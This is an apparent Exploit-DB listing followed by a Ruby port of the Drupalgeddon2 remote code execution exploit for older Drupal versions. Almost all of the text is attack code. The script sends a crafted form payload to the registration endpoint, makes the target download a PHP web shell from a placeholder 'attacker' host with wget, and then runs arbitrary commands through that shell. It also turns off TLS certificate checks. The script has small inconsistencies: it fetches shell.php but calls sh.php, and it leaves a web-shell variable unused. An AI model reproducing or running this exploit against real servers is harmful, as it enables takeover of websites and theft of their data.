bef325a736
9 changes to exploits/shellcodes GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation Microsoft Credential Security Support Provider - Remote Code Execution WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) MikroTik 6.41.4 - FTP daemon Denial of Service PoC Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
41 lines
No EOL
1.1 KiB
Ruby
Executable file
41 lines
No EOL
1.1 KiB
Ruby
Executable file
# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
|
|
|
|
require 'net/http'
|
|
|
|
# Hans Topo ruby port from Drupalggedon2 exploit.
|
|
# Based on Vitalii Rudnykh exploit
|
|
|
|
target = ARGV[0]
|
|
command = ARGV[1]
|
|
|
|
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
|
|
|
shell = "<?php system($_GET['cmd']); ?>"
|
|
|
|
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
|
|
|
|
uri = URI(url)
|
|
|
|
http = Net::HTTP.new(uri.host,uri.port)
|
|
|
|
if uri.scheme == 'https'
|
|
http.use_ssl = true
|
|
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
|
end
|
|
|
|
req = Net::HTTP::Post.new(uri.path)
|
|
req.body = payload
|
|
|
|
response = http.request(req)
|
|
|
|
if response.code != "200"
|
|
puts "[*] Response: " + response.code
|
|
puts "[*] Target seems not to be exploitable"
|
|
exit
|
|
end
|
|
|
|
puts "[*] Target seems to be exploitable."
|
|
|
|
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
|
|
response = Net::HTTP.get_response(exploit_uri)
|
|
puts response.body |